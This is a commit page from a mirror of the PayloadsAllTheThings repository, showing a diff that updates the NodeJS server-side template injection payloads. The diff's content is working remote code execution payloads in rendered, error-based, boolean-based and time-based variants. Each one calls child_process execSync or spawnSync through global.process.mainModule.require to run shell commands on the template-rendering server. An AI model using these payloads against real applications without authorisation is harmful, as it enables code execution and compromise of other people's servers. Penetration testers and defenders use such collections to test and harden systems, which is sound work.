Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2026-01-17 21:51:26 +01:00
Code Issues Projects Releases Wiki Activity

SSTI:

Browse source 
- Fixed NodeJS payloads
This commit is contained in:
vladko312 2026-01-03 18:43:24 +03:00
parent 7fb2ff75d7
commit abbbf2fc95
1 changed files with 7 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
Server Side Template Injection/JavaScript.md
View file

@ -41,17 +41,17 @@ To use these payloads, wrap them in the appropriate tag.
```javascript
// Rendered RCE
require("child_process").execSync("id")
global.process.mainModule.require("child_process").execSync("id")
// Error-Based RCE
require("Y:/A:/"+require("child_process").execSync("id"))
""["x"][require("child_process").execSync("id")]
global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id"))
""["x"][global.process.mainModule.require("child_process").execSync("id")]
// Boolean-Based RCE
[""][0 + !(require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"]
[""][0 + !(global.process.mainModule.require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"]
// Time-Based RCE
require("child_process").execSync("id && sleep 5")
global.process.mainModule.require("child_process").execSync("id && sleep 5")
```
NunjucksJS is also capable of executing these payloads using `{{range.constructor(' ... ')()}}`.
@ -149,6 +149,8 @@ ${= _.VERSION}
## Pug
> Universal payloads also work for Pug.
[Official website](https://pugjs.org/api/getting-started.html)
>